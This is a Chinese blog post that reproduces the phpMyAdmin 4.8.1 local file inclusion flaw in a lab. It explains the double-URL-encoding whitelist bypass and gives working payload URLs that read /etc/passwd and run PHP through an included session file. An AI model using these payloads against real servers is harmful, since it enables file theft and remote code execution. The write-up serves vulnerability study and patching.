前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >PHPMyAdmin4.8.1任意文件读取漏洞复现

PHPMyAdmin4.8.1任意文件读取漏洞复现

作者头像
墙角睡大觉
发布2019-09-24 15:57:13
2.1K0
发布2019-09-24 15:57:13
举报

漏洞影响版本: 4.8.1

0X1 环境搭建

下载源码包之后本地搭建放置在phpstudy的WWW目录下即可。

访问环境,不需要密码即可登录到phpmyadmin页面

0X2 漏洞分析

漏洞问题出在index.php的第53行开始位置:

target参数没有过滤,并且直接include,很显然是LFI的前奏

第57行限制 target 参数不能以index开头

第58行限制 target 参数不能出现在 $target_blacklist 内

找到 $target_blacklist 的定义:

就在 /index.php 的第50行

只要 target 参数不是import.php 或 export.php 就行

最后一个限制是如下方法

问题出现在了第 465 行的urldecode()

我们可以利用这个函数绕过白名单检测!

我把 ? 两次url编码为 %253f 即可绕过验证!

0X3 漏洞利用

最后的payload是:

http://10.10.1.26:8082/index.php?target=db_sql.php%253f/../../../../../../etc/passwd

访问之后得到passwd结果

写入shell,测试语句:<?php phpinfo();exit;?>

Bp抓包获取本地的cookie值:

访问:

http://10.10.1.26:8082/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_de2e83061d3002f6418823905abb63cb

0X4 漏洞修复

升级到最新版即可

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-01-22,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 安全漏洞环境学习 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
脆弱性检测服务
脆弱性检测服务(Vulnerability detection Service,VDS)在理解客户实际需求的情况下,制定符合企业规模的漏洞扫描方案。通过漏洞扫描器对客户指定的计算机系统、网络组件、应用程序进行全面的漏洞检测服务,由腾讯云安全专家对扫描结果进行解读,为您提供专业的漏洞修复建议和指导服务,有效地降低企业资产安全风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档